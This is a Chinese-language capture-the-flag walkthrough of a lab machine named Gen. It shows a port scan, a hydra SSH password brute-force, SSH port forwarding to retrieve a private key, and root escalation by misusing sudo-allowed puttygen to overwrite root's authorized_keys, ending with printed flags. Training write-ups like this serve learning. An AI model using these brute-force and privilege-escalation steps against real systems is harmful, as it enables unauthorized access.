# 靶场搭建
下载:Gen
Nat,IP: 192.168.1.175
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | |
| ssh-hostkey: | |
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA) | |
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519) |
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | |
| ssh-hostkey: | |
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA) | |
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519) | |
80/tcp open http Apache httpd 2.4.57 ((Debian)) | |
|_http-title: Site doesn't have a title (text/html). | |
|_http-server-header: Apache/2.4.57 (Debian) |
http://192.168.1.175/note.txt 拿到一个信息
Hello Mark, | |
- We have secured the internal server and it is now available on port 9999. | |
- There you will find Peter private key (don't forget that it has a different format and he has to convert it for it to work). | |
Thanks. |
用户 mark 和 peter
枚举一下密码
┌──(root㉿kali)-[~] | |
└─# hydra -t 64 -l mark -P pass ssh://192.168.1.175 -I | |
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). | |
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-02 04:01:10 | |
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 | |
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore | |
[DATA] max 64 tasks per 1 server, overall 64 tasks, 5000 login tries (l:1/p:5000), ~79 tries per task | |
[DATA] attacking ssh://192.168.1.175:22/ | |
[STATUS] 351.00 tries/min, 351 tries in 00:01h, 4676 to do in 00:14h, 37 active | |
[22][ssh] host: 192.168.1.175 login: mark password: genesis |
ssh 上去发现有警告无法进入 shell,前面的 note 已经告诉了有 9999 端口访问,那就做端口转发: ssh -L 9999:127.0.0.1:9999 [email protected]
结合 note 知道里面有个 peter 的私钥: http://127.0.0.1:9999/id_rsa.ppk
apt install -y putty-tools 后用 puttygen 转换私钥格式: puttygen id_rsa.ppk -O private-openssh -o id_rsa
# 提权
peter@gen:~$ su mark | |
Contraseña: | |
mark@gen:/home/peter$ sudo -l | |
Matching Defaults entries for mark on gen: | |
env_reset, mail_badpass, | |
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty | |
User mark may run the following commands on gen: | |
(root) NOPASSWD: /usr/bin/puttygen | |
mark@gen:/home/peter$ cd ~ | |
mark@gen:~$ puttygen -t rsa -o id_rsa -O private-openssh | |
+++++++++++++++++++++++++ | |
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ | |
Enter passphrase to save key: | |
Re-enter passphrase to verify: | |
mark@gen:~$ sudo -u root /usr/bin/puttygen id_rsa -o /root/.ssh/authorized_keys -O public-openssh | |
mark@gen:~$ chmod 600 id_rsa | |
mark@gen:~$ ssh -i id_rsa root@localhost | |
The authenticity of host 'localhost (::1)' can't be established. | |
ED25519 key fingerprint is SHA256:4K6G5c0oerBJXgd6BnT2Q3J+i/dOR4+6rQZf20TIk/U. | |
This key is not known by any other names. | |
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes | |
Warning: Permanently added 'localhost' (ED25519) to the list of known hosts. | |
root@gen:~# find / -name user.txt -o -name root.txt |xargs cat | |
f003a3bc3ff27072d6ac2c7a1ab63254 | |
d045787a2743570b0dc1aea01fc952ce |
